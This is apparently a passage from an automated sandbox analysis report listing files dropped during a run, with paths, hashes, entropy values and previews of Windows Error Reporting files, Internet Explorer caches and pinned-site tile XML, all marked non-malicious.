.r.a.n.s.f.e.r.C.o.u.n.t.,.H.a.n.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER1F13.tmp.txt Download File
Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	13340
Entropy (8bit):	2.6957211147642455
Encrypted:	false
SSDEEP:	96:9GiZYWz1uFnoY1YGWKxRHhUYEZfGt7i0FRQIwb8QUawvDHw80I3w3:9jZDzByV4ZAawvDHw8j3w3
MD5:	96C053D8B81B4600919D01B6CD073CAA
SHA1:	6724BC587EE16E66AD56542192CA20EC9AADE508
SHA-256:	8E5C415F2EA6F7149F427E0374D7CFE02A3D834B9DE24493F904A22B02EB77BC
SHA-512:	DFB9C3D1A46A58D81BAA7134DFB40E072EAAC0682BA16E3D8FC92C03C8C1B972A832B110F1D91047BCAE32CD2FECA77FA1C30921EA77D10761C95B83364A7D0A
Malicious:	false
Reputation:	unknown
Preview:	B...T.i.m.e.r.R.e.s.o.l.u.t.i.o.n. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.5.6.2.5.0.....B...P.a.g.e.S.i.z.e. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .4.0.9.6.....B...N.u.m.b.e.r.O.f.P.h.y.s.i.c.a.l.P.a.g.e.s. . . . . . . . . . . . . . . . . . . . . . . . . . .1.0.4.8.3.1.5.....B...L.o.w.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.....B...H.i.g.h.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . .1.3.1.0.7.1.9.....B...A.l.l.o.c.a.t.i.o.n.G.r.a.n.u.l.a.r.i.t.y. . . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.i.n.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.a.x.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . .1.4.0.7.3.7.4.8.8.2.8.9.7.9.1.....B...A.c.t.i.v.e.P.r.o.c.e.s.s.o.r.s.A.f.f.i.n.i.t.y.M.a.s.k. . . . . . .

C:\ProgramData\Microsoft\Windows\WER\Temp\WERE1EF.tmp.dmp Download File
Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 15 streams, Fri Dec 3 08:43:03 2021, 0x1205a4 type
Category:	dropped
Size (bytes):	26648
Entropy (8bit):	2.3774750227849824
Encrypted:	false
SSDEEP:	192:Fqkw3YLsPOfrXDuoVoQD/gylEh+ifjbFtIGz5oc1cpJ:WO7DuoVP/gyi+YjbFtIGz51
MD5:	B5B2028D64C3E4CD3D85A54AE36E772E
SHA1:	A69484C606AFB230A27615115E9DCD11E3419685
SHA-256:	90B05C149F6B052BDFE5AAB731018F4A8C5CF200D2BB51B2E19F8C7B73692272
SHA-512:	0312C35C6FE270AE6F4D59FEE7DB6215116A8E98728B1AE74B9D7B93EB4BB29E567B6E36FFAF6DBE6D422E086291EEB72C98EF7B6CAF082EBAAC23E86A9D8285
Malicious:	false
Reputation:	unknown
Preview:	MDMP....... .........a............4...............H.......$...........................`.......8...........T...............(\...........................................................................................U...........B......\|.......GenuineIntelW...........T...........k.a.............................0..................P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.........................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WERE6D2.tmp.WERInternalMetadata.xml Download File
Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
Category:	dropped
Size (bytes):	8338
Entropy (8bit):	3.7008603786017
Encrypted:	false
SSDEEP:	192:Rrl7r3GLNiDM66FxSO6YIhSUwcmsgmfcSzxCpBY89b4ssfUwiom:RrlsNiI69O6YuSUwcmsgmfcSz+4/fA
MD5:	DEB2A26B3EC45AC029731CA2E43FF096
SHA1:	EB4D5D024BDEF9880F941DEA3D487DF3270EF06A
SHA-256:	52850AF2FFF9A3C85B44CAAD222A603EA76EE1F210BE915825A4082CE1FC0ECD
SHA-512:	BF7EC704A8B93AA5C697284686905035385CB0208B99F1139AEBAB56590AE0BAA08908D59DDC281172E158A2CDBA8A1772591B563E0545FE34A0170931682F60
Malicious:	false
Reputation:	unknown
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.4.2.5.2.<./.P.i.d.>.......

C:\ProgramData\Microsoft\Windows\WER\Temp\WERED7A.tmp.xml Download File
Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4598
Entropy (8bit):	4.4744243638310195
Encrypted:	false
SSDEEP:	48:cvIwSD8zsqJgtWI93/WSC8BST8fm8M4J2ynZFQ+q84WDd7KcQIcQwQjd:uITf4UuSNHJ1UYxKkwQjd
MD5:	21528E9C0320ABFE56D7486E5912639D
SHA1:	09253E0F095606678076079D8E98A19839F6F9D3
SHA-256:	775A5E43C74365032FE63969B9AE73E17905E0764636369F66D5CA75C0C8AFE2
SHA-512:	36433334AE3A882C9E647716825FE5CC576111EA73AE7A8CEAA4213A92BBD5461214CF4CBA2792A2E46098B01DC87D62EF730D835B9F0FBF5CE8B52C8B0AAB61
Malicious:	false
Reputation:	unknown
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1281233" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\DOMStore\DURNCK2N\www.msn[2].xml Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	139
Entropy (8bit):	5.230477217930516
Encrypted:	false
SSDEEP:	3:D9yRtFwsx6wmxvFuqLHIfwEYPJGX7T40AAezQnsIAqSk8lKRKb:JUFkduqswEkIXH40AAe8slrb
MD5:	1E9BCCF0E156B564317D508AF66F7DC7
SHA1:	5513D0DA7C150A3D841D21F8264E3C61A3B7C126
SHA-256:	C87190A70F853287D4CEF89D8FAA550054A38C47EB16E306DCBD921067295003
SHA-512:	0595D20B77F775E4585D5467B79D0B54FD207707D5D9A71550C5FE77A06C87AA6813DB53B71647161226C544FEEA2481C8D23E6890B6F7DBAB80DD8E057DC004
Malicious:	false
Reputation:	unknown
Preview:	<root><item name="BT_AA_DETECTION" value="{"ab":false,"acceptable":true}" ltime="3159146224" htime="30926881" /></root>

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\DOMStore\QALADACS\contextual.media[1].xml Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	238
Entropy (8bit):	4.855071670282855
Encrypted:	false
SSDEEP:	6:JUFdscq93yeRl73xqV+5yeRl73ncqPC2DoH93yeRlrb:JUTsp93yw0VmywNPC2DoHdywP
MD5:	6BFD10B37F61450343C21C68E6B61EC7
SHA1:	293A1ACB6CC01E495645D5591D17F26D6C385142
SHA-256:	E37367CBEDE55B3DEC3483C58CCC641762C2715C5533DCF14F39A9FDE2DAB87F
SHA-512:	CBEC1AA332511F2F15D43FDB76B49E9B4E8E1EF49C6FA3351FDC16D8B4199CD2E1E0CC6C9F6B5761C2AC1C1C9FE2064E22D0E1924FD28F418370D071F12D0B9C
Malicious:	false
Reputation:	unknown
Preview:	<root><item name="HBCM_BIDS" value="{}" ltime="3067616224" htime="30926881" /><item name="maxbid" value="0.03" ltime="3067616224" htime="30926881" /><item name="maxbidts" value="1638520953012" ltime="3067616224" htime="30926881" /></root>

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{EDD38171-5414-11EC-90E5-ECF4BB570DC9}.dat Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	Composite Document File V2 Document, Cannot read section info
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	2.153372845333922
Encrypted:	false
SSDEEP:	12:rlxAFprEgmw+IaCr8Oh5EZIBWSFdEXDrEgmgli+IaCy5EZIB1hREZIusyMeMiw0S:rqGo/QwEyFQG//EEyTEyqMJ39lWG4
MD5:	3CD28A822E4F3133E44187FC762D3CC8
SHA1:	34C65E8039C981E90F5813993125DEED873E19FB
SHA-256:	818A57C2E0041BCFC739E777E420FB3062542F67B51B6B8B521F8C9DD22DE0D6
SHA-512:	752D60D02628F88E09ACD2720B39B8190D5A0CF4BA481844277C44DC8B1AEDC24EB20DC867906023A0902595EF96D4778E68416DFFA4E3938543C755FC207B78
Malicious:	false
Reputation:	unknown
Preview:	......................>.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y......................................................................................... .1.!.................K.j.j.a.q.f.a.j.N.2.c.0.u.z.g.v.1.l.4.q.y.5.n.f.W.e...........8...............................................................F.r.a.m.e.L.i.s.t.......................................................................................................0.......O._.T.S.c.o.H.T.7.R.R.U.7.B.G.Q.5.e.z.0.u.1.c.N.y.Q.=.=.........:.......................................

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{04DC069A-5415-11EC-90E5-ECF4BB570DC9}.dat Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	Composite Document File V2 Document, Cannot read section info
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	1.676522738218554
Encrypted:	false
SSDEEP:	12:rl0oXGFdEXDrEgm8Gr76F7ylXDrEgm8GD7qw9lpQA9dv9lsQ0Y9cC:rmQG82lTG8C9laAH9lr0Y2
MD5:	CF1542ED0B94952F6FCF2093BBFCA7A4
SHA1:	341C607B4F8B745A1B8F914563A9C379DD75A9B4
SHA-256:	BF6395EFD4F5CE10C9DB8F60963B4B2F0779F9D2B4635FEFD39F459A5EF536BE
SHA-512:	CC7ADB33568B0E6C42FBDD33B9716E63FB008A180D05565C1F99CACA5D2373EFC3B943C0FA934A25C9A37F3646D79640464ED27ACC06A1C0193215575B18149B
Malicious:	false
Reputation:	unknown
Preview:	......................>.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y......................................................................................... .1.!.................K.j.j.a.q.f.a.j.N.2.c.0.u.z.g.v.1.l.4.q.y.5.n.f.W.e...........8.......................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{EDD38173-5414-11EC-90E5-ECF4BB570DC9}.dat Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	Composite Document File V2 Document, Cannot read section info
Category:	dropped
Size (bytes):	332288
Entropy (8bit):	3.5946311553518058
Encrypted:	false
SSDEEP:	3072:8Z/2Bfcdmu5kgTzGtBZ/2Bfc+mu5kgTzGtjZ/2Bfcdmu5kgTzGt6Z/2Bfc+mu5kn:1e5B
MD5:	121CCD4CC8FFED07908CC403099A2957
SHA1:	E269DBEB1A75352B8AFBC950F73867FCED6FCCC6
SHA-256:	91C400A6EE72AC9A33F877FF9651D7FD4C5C21F2EB957994B795F4A5AF1B62E5
SHA-512:	4359CD914517AC789BD7FCF8195354C72C3B661C3AE92CBBD0FBF8A4F25CAFE7F9C3112CF45C6F524D8CE9DA23D4307D2BD9DD2DB6887F2FE28DD63EFE94934F
Malicious:	false
Reputation:	unknown
Preview:	......................>...........................................................F...G...H...I...............................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.............................................................................................!.................K.j.j.a.q.f.a.j.N.2.c.0.u.z.g.v.1.l.4.q.y.5.n.f.W.e...........8.......................................................4.......T.r.a.v.e.l.L.o.g...............................................................................................................T.L.0...................................................................................................

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-17529550060\msapplication.xml Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	356
Entropy (8bit):	5.110618531449803
Encrypted:	false
SSDEEP:	6:TMVBdc9EMdLD5Ltqc41E+3k7z3+Bi4TD90/QL3WIZK0QhPPFVDHkEtMjwu:TMHdNMNxOE+iuXnWimI00ONVbkEtMb
MD5:	3AE1C856231E41F469DF3DB157003485
SHA1:	A1B049F4ED3430890EEC26F1D2347B8414554144
SHA-256:	D197FFB50B065F9B63F007A55A519B233FD090BAC85683AF9C911F5B8F4B9A9E
SHA-512:	382E59C9EB3465BE82472628910D02A4312BE93F916F9B9196D29A8603FBFEACAA2E15790623C5EEAA7CEC548537118E0FC8913BA6DE631C94F600CD3320F1BE
Malicious:	false
Reputation:	unknown
Preview:	<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0xd34ab932,0x01d7e821</date><accdate>0xd3db91dd,0x01d7e821</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Twitter.url"/></tile></msapplication></browserconfig>..

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-18270793970\msapplication.xml Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	354
Entropy (8bit):	5.130249711294393
Encrypted:	false
SSDEEP:	6:TMVBdc9EMdLD5Ltqc4fLGTk4MYNKa+t4TD90/QL3WIZK0QhPPFkI5kU5EtMjwu:TMHdNMNxe2ksLtnWimI00ONkak6EtMb
MD5:	DF5AF26EEFE7686F3ADB05016105EBAA
SHA1:	FDB8DA27177D70CA876FA3C3F3E93160B5071164
SHA-256:	F577123C51092506C5BF966D479FB2C9F4AE44F16BAC8FADAB9CD7075A857EDD
SHA-512:	8E954189749D4DE7F20CF85F27720AB26F9FDD97EC3A9260C0A00B8E3E896264C7D809DA1042868C4B6DE8998FA2BCC159BAF4408FDC36B0FB00FBF661484486
Malicious:	false
Reputation:	unknown
Preview:	<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.amazon.com/"/><date>0xce2b3ae4,0x01d7e821</date><accdate>0xce4a3987,0x01d7e821</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Amazon.url"/></tile></msapplication></browserconfig>..

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-21706820\msapplication.xml Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	360
Entropy (8bit):	5.121202695494939
Encrypted:	false
SSDEEP:	6:TMVBdc9EMdLD5Ltqc4GLsmzoK5f4TD90/QL3WIZK0QhPPFyhBcEEtMjwu:TMHdNMNxvLsVnWimI00ONmZEtMb
MD5:	6196164AC08A4E5859DB38FBEBBC0357
SHA1:	5A731E4993E2546FF6C0714B32082050A32ED382
SHA-256:	17D32AB3D216CD88A8BC05B7344760CECEF5F1D017F317DA3169A91C51468048
SHA-512:	232DFF59023DA5BCF4F14AC3F04572DA38D177762C5701CC94E8A93D982552BCE7B8C178AFC98134F23B2F04623389A230F0D7F992A8DF30C7994B0FB7AC7DE4
Malicious:	false
Reputation:	unknown
Preview:	<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.wikipedia.com/"/><date>0xd44e02cc,0x01d7e821</date><accdate>0xd53c6cf8,0x01d7e821</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Wikipedia.url"/></tile></msapplication></browserconfig>..

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-4759708130\msapplication.xml Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	350
Entropy (8bit):	5.118698047831226
Encrypted:	false
SSDEEP:	6:TMVBdc9EMdLD5Ltqc4JoewNGQ+Yi4TD90/QL3WIZK0QhPPFgE5EtMjwu:TMHdNMNxion0PYXnWimI00ONd5EtMb
MD5:	D5A3ACACD6253AD6F2427A85FDD680E0
SHA1:	36CD9D3549CE0EFCC3A9A7BC50FC4F579D121812
SHA-256:	6A076B6ED4BCB161B1D730688116F8E1B0EBA7F8DF415F81856F0993FD833F1E
SHA-512:	6044EC53FB82ACD8BAE597D15CA949B5F606A8358AB26C3D0D3082A51B90D298F4C423D058BBB6395C26E9BDF56E932FE99C2B426169D2D464DDC39022AB210A
Malicious:	false
Reputation:	unknown
Preview:	<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.live.com/"/><date>0xd0034d2f,0x01d7e821</date><accdate>0xd059213d,0x01d7e821</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Live.url"/></tile></msapplication></browserconfig>..

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-6757900\msapplication.xml Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	356
Entropy (8bit):	5.151892510208132
Encrypted:	false
SSDEEP:	6:TMVBdc9EMdLD5Ltqc4UxGwu9/3Yi4TD90/QL3WIZK0QhPPF8K0QU5EtMjwu:TMHdNMNxhGw2/anWimI00ON8K075EtMb
MD5:	D4F2F79D65D7DB79D576A2EED3AE12F0
SHA1:	A7712AADA108CAF60418841C7F40B8650F97810E
SHA-256:	A0F0EA02928F1EF5F791D3564F9E91D1261950CB06FDD93303A2AF9C86A7BB85
SHA-512:	6427A253A7032F94F43CA252526ACF9D415FB6785CF6BE84F4FCDC7AD1B30A49E90806B1AC6F96E7A05BBFEB2F0F7A9EAC5FA5727367A612384C723662E8B516
Malicious:	false
Reputation:	unknown
Preview:	<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0xd6097753,0x01d7e821</date><accdate>0xd7671fa9,0x01d7e821</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Youtube.url"/></tile></msapplication></browserconfig>..

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-8760897390\msapplication.xml Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	354
Entropy (8bit):	5.110817646432418
Encrypted:	false
SSDEEP:	6:TMVBdc9EMdLD5Ltqc4QunqWd+E33v4TD90/QL3WIZK0QhPPFAkEtMjwu:TMHdNMNx0nOnWimI00ONxEtMb
MD5:	DA8D474AA9EA0AB9CE1888A7B0C4CF03
SHA1:	BEF6BEA8DAEFE5ECA6F68333BB08CECB9B854BFD
SHA-256:	E571148777615CDD677538ED11955EBE9DA330F34EB89FE60AA4C8A3F58D400A
SHA-512:	0E1CA249193727154B8A8D8DBCBE5E46870C20B5AC7F8C9C7AC532E197FA099CB781BFF8B9B6191C5CA57CC5336A6F828F94B3149FD24534ECF49F2E62145A4B
Malicious:	false
Reputation:	unknown
Preview:	<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.reddit.com/"/><date>0xd2388a98,0x01d7e821</date><accdate>0xd2c9fa41,0x01d7e821</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Reddit.url"/></tile></msapplication></browserconfig>..

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin20259167780\msapplication.xml Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	356
Entropy (8bit):	5.142334749564316
Encrypted:	false
SSDEEP:	6:TMVBdc9EMdLD5Ltqc4oTo2Ne4TD90/QL3WIZK0QhPPF6Kq5EtMjwu:TMHdNMNxxoYnWimI00ON6Kq5EtMb
MD5:	C31091D1FF66230B462E64B887FB786E
SHA1:	1AE44E02AF18E066F359A15554E822DDAC6E057E
SHA-256:	690886BA655FFBF10C6BC95C075AA5DE927C7844A4AD0F15DE53003439CBC1AF
SHA-512:	CB3802F5211F3E30B36F0B836E11CD579BECDBBD22878A4BFB668002DC052B1FF5C3FADCF0DB7884C6BEC72BBDBF3D91F167C69337F7A6EA80EC18B2A9A10BC9
Malicious:	false
Reputation:	unknown
Preview:	<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.nytimes.com/"/><date>0xd0d2e999,0x01d7e821</date><accdate>0xd180f720,0x01d7e821</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\NYTimes.url"/></tile></msapplication></browserconfig>..

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin20332743330\msapplication.xml Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	358
Entropy (8bit):	5.091058260104519
Encrypted:	false
SSDEEP:	6:TMVBdc9EMdLD5Ltqc4YX2n46uNK554TD90/QL3WIZK0QhPPF02CqEtMjwu:TMHdNMNxc6dnWimI00ONVEtMb
MD5:	367E3CB557D2DCC8FE458F4757DF8BCA
SHA1:	7B0BC478CD063CE12F0F3B0DB18AE1537B637618
SHA-256:	940F55CE80B2BFEEE287392042E24801882B47402741B68246C145D6942757B5
SHA-512:	D79B9D21D7EB84B7943D1D97C20322E1472CBDF9F10A3631C635632AAE987B52884D29538DF839C0351AF52F36A71EAE58E801B1B5A2EF353EAEB702A96D90C4
Malicious:	false
Reputation:	unknown
Preview:	<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0xceabfacf,0x01d7e821</date><accdate>0xcee9f868,0x01d7e821</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Facebook.url"/></tile></msapplication></browserconfig>..

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin8215062560\msapplication.xml Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	354
Entropy (8bit):	5.093130723297601
Encrypted:	false
SSDEEP:	6:TMVBdc9EMdLD5Ltqc4IncHxIZ4TD90/QL3WIZK0QhPPFiwE5EtMjwu:TMHdNMNxfnknWimI00ONe5EtMb
MD5:	7B44D76EFE4E5FEA2A5AC5C407F892FF
SHA1:	C65D2194E02E3D67BD9F0BC312CBD4EC79F0341C
SHA-256:	04705A1C53F0C4669407DEA90D360BC87C7A108EDAE17366EC1D64F43EFEDCF3
SHA-512:	567890705C70630ED9A3E20E199912CFC5BE6C9DAC68123ECBD69942B8898C7E7F86B41D5BCCF9CE91758E5288F00CB0EA1583049953410E397A66CF790A84FC
Malicious:	false
Reputation:	unknown
Preview:	<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.google.com/"/><date>0xcf27f3ee,0x01d7e821</date><accdate>0xcf7b6660,0x01d7e821</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Google.url"/></tile></msapplication></browserconfig>..

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\imagestore\dikxvqf\imagestore.dat Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	data
Category:	dropped
Size (bytes):	22330
Entropy (8bit):	4.292972093789141
Encrypted:	false
SSDEEP:	96:eQQQQQ1n9KlyzS29dcBUXqupkE1OwDzXIzS29dcBUXqo:3n4QzSAcBQpkEgcz4zSAcBa
MD5:	6F455F69E249AB08EBDED130501A1CF5
SHA1:	A62F07AFF6AB8972F1ADBF67251720D7EE102D6D
SHA-256:	7E1F2D03177859590CFCBF6BAD8BC0518D9B2A2635C82B32D8F3CFB8960ECFEB
SHA-512:	84FEF8BA69DD1B6552B84D0D8772683D342CD918BB7EFA8092E1EDE7D59F196CC03506F2588F2FBBAB4B164CC00AD7B1FC3323C8526B241D3D8D8EA36C9B3948
Malicious:	false
Reputation:	unknown
Preview:	........%.h.t.t.p.s.:././.w.w.w...m.i.c.r.o.s.o.f.t...c.o.m./.f.a.v.i.c.o.n...i.c.o.~(................h(......(....................(....................................."P.........................................."""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333""""""""""""""""""

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\4PB7FJMT\46a64e19-d1cf-494e-8a93-1a179ccdaae9[1].jpg Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 300x300, frames 3
Category:	dropped
Size (bytes):	62216
Entropy (8bit):	7.9611985744209015
Encrypted:	false
SSDEEP:	1536:tGmB0lzXjpJ+b/eA4b6Ta4/YSRX2m06i/qNc097F4zaww9fe:RBeFkb/9I6TaK9KYR4VX
MD5:	D3B606F44F4035D110753D9C12B38051
SHA1:	4BECDD0487DAD8FD021A355E25BB93E6A1486817
SHA-256:	CA0634520BFBB563FB5AFF0B3BDD5F42B12961D6F2453E0C1F01F49DE17D48E7
SHA-512:	17A02FDF1F3ADF3F443A95A4C202ECF407DED8E6CDAF961A40F6B3781BD618BA59B2EF39AFDD5D0B9F6A627B9C896A2A90C568D48461E9C0F05E50392F80E385
Malicious:	false
Reputation:	unknown
